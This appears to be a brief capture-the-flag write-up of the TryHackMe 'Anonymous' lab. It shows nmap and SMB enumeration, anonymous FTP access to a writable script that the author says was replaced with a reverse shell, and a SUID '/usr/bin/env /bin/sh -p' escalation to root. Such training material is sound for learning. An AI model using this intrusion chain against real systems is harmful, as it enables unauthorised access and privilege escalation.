tryhackme
// 2024-12-30
// ID: REF-Anonymous
Anonymous
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.21.16.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 6
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 4 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2025-10-12T19:51:09+00:00
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
| smb2-time:
| date: 2025-10-12T19:50:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_smb-vuln-ms10-061: false
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 12s, deviation: 42s, median: -1s
❯ smbclient -L 10.201.110.36
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP ANONYMOUS
❯ smbclient //10.201.110.36/pics
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun May 17 07:11:34 2020
.. D 0 Wed May 13 21:59:10 2020
corgo2.jpg N 42663 Mon May 11 20:43:42 2020
puppos.jpeg N 265188 Mon May 11 20:43:42 2020
20508240 blocks of size 1024. 13306808 blocks available
smb: \> get corgo2.jpg
getting file \corgo2.jpg of size 42663 as corgo2.jpg (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)
smb: \> get puppos.jpeg
getting file \puppos.jpeg of size 265188 as puppos.jpeg (57.6 KiloBytes/sec) (average 41.2 KiloBytes/sec)
smb: \>
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10796|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 3741 Oct 12 20:09 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||9328|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |**************************************************************************************************************| 314 5.54 MiB/s 00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (0.61 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||32644|)
150 Opening BINARY mode data connection for removed_files.log (3741 bytes).
100% |**************************************************************************************************************| 3741 2.76 MiB/s 00:00 ETA
226 Transfer complete.
3741 bytes received in 00:00 (5.63 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||24035|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |**************************************************************************************************************| 68 6.99 KiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.19 KiB/s)
ftp>
modify clean.sh to putting reverse shell and upload and get reverse shell
ftp> put clean.sh clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||15273|)
150 Ok to send data.
100% |**************************************************************************************************************| 55 671.38 KiB/s 00:00 ETA
226 Transfer complete.
55 bytes sent in 00:00 (0.06 KiB/s)
ftp>
get user.txt
namelessone@anonymous:~$ ls
ls
pics user.txt
namelessone@anonymous:~$ cat user.txt
use linpeas found suid case for env
namelessone@anonymous:/tmp$ /usr/bin/env /bin/sh -p
# ls
root.txt